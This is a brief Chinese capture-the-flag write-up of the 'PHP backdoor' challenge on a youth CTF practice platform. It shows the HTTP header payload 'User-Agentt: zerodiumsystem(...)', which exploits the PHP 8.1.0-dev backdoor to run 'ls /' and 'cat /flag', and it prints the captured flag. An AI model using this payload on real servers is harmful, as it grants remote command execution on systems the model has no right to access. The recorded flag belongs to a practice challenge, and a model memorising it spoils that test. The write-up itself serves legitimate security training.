青少年CTF练习平台 PHP的后门

马船长2025-01-25 0:35

题目

根据提示,PHP/8.1.0-dev漏洞,修改请求头利用此漏洞

注意 zerodium后面拼接函数发送

html 复制代码 
User-Agentt:zerodiumsystem("ls /");

读取flag

html 复制代码 
User-Agentt: zerodiumsystem("cat /flag");

拿下flag

flag{d514c824035b427da2d1c14edb5ae098}

相关推荐
不过普通话一乙不改名11 分钟前
第四章:并发编程的基石与高级模式之atomic包与无锁编程
开发语言·golang
Amber_371 小时前
深入理解Go 与 PHP 在参数传递上的核心区别
android·golang·php
三小尛2 小时前
C++继承
开发语言·c++
诗书画唱2 小时前
JavaScript 基础核心知识点总结:从使用方式到核心语法
开发语言·javascript·ecmascript
AndrewHZ2 小时前
【python开发123】三维地球应用开发方案
开发语言·python·计算机视觉·三维重建·遥感图像分析
WSSWWWSSW2 小时前
Python Imaging Library (PIL) 全面指南:Python Imaging Library (PIL)基础图像处理入门
开发语言·图像处理·python
橙序员小站4 小时前
Lombok vs Java Record:谁才是未来?
java·开发语言·python
空白到白4 小时前
Python-机器学习概述
开发语言·python·机器学习
热门推荐
01UV安装并设置国内源02不再让Windows更新!&Edge游戏助手卸载及关闭自动更新03KGG转MP3工具|非KGM文件|解密音频04奈飞工厂官网,国内Netflix影视在线看|中文网页电脑版入口05Linux下V2Ray安装配置指南06Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code07【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)08突破百度网盘的下载限速,两种方法教会你【超详细】09蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接10Claude Code VSCode集成开发指南:AI编程助手完整配置